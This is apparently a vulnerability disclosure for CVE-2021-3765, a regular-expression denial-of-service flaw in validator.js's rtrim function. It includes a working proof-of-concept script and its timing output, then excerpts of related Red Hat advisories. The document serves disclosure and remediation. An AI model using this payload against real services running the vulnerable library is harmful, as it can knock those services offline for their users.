Headline
CVE-2021-3765: Inefficient Regular Expression Complexity in validator.js
validator.js is vulnerable to Inefficient Regular Expression Complexity
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.
It allows cause a denial of service when calling function 'rtrim’.
The ReDoS vulnerability is mainly due to the regex /(\s)+$/g and can be exploited with the following code.
Proof of Concept
// PoC.js
var validator = require("validator")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = 'a'+' '.repeat(i*10000)+"a";
validator.rtrim(attack_str);
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The Output
"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"
Reference
I have opened an issue before, but it is still not safe after fix.
For repair, you can refer to the rtrim function in package trim
Occurrences
Related news
Red Hat Security Advisory 2023-7820-03 - Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.12.10 on Red Hat Enterprise Linux 8 from Red Hat Container Registry.
Red Hat Security Advisory 2023-3742-02 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. Issues addressed include bypass, denial of service, and remote SQL injection vulnerabilities.
Updated images that include numerous enhancements, security, and bug fixes are now available in Red Hat Container Registry for Red Hat OpenShift Data Foundation 4.13.0 on Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-16250: A flaw was found in Vault and Vault Enterprise (“Vault”). In the affected versions of Vault, with the AWS Auth Method configured and under certain circumstances, the values relied upon by Vault to validate AWS IAM ident...